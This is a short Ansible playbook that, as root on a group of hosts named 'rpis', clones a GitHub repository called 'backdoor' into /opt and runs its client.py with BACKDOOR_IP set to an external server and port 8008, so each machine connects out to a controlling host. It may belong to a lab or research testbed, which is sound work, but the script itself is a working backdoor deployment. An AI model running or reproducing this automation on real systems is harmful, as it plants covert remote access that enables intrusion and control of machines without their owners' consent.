---
- name: Install Jakoritarleite Backdoor client
  hosts: rpis
  remote_user: root
  tasks:
     - name: Test access and FS
       command: "touch /tmp/ansible_was_here"


     - name: Install source
       ansible.builtin.git:
         repo: https://github.com/jvdassen/backdoor
         dest: /opt/backdoor_jakoritarleite

     - name: Run client.py 
       shell: |
         cd /opt/backdoor_jakoritarleite
         export BACKDOOR_IP={{ hostvars['server_external'].ansible_host }};
         export BACKDOOR_PORT=8008;
         python3 client.py
       args:
         executable: /bin/bash

